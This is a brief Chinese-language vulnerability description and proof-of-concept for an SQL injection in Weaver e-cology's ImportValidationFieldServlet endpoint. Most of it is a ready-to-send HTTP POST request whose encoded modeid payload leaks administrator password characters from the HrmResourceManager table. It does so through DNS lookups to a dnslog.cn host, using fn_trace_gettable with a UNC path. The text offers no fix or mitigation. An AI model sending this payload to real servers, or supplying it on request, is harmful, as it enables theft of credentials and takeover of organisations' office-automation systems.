漏洞描述
该漏洞存在于泛微e-cology的ImportValidationFieldServlet接口,该接口用于处理导入操作时字段的验证。其处理函数selectfieldData接收用户输入的modeid参数,直接拼接进行SQL语句执行,从而导致SQL注入漏洞。攻击者可利用该漏洞获取数据库敏感信息以及服务器控制权限。
泛微ecology ImportValidationFieldServlet 前台SQL注入漏洞
PoC代码
POST /weaver/weaver.formmode.setup.ImportValidationFieldServlet/login HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
action=select&type=1&modeid=%27and-0%3D%27%27and-0%3E%28select-1from+fn_trace_gettable%28%27%5C%5C%27%2Bchar%28-%28select-unicode%28%7Bfn+substring%28password%2C1%2C1%29%7D%29from+HrmResourceManager%29%29%2B%271.666.xxxxx.dnslog.cn%5Cfoo.trc%27%2Cdefault%29%29and-0%3D%27&selfieldid=1&fieldids=1&rownum=1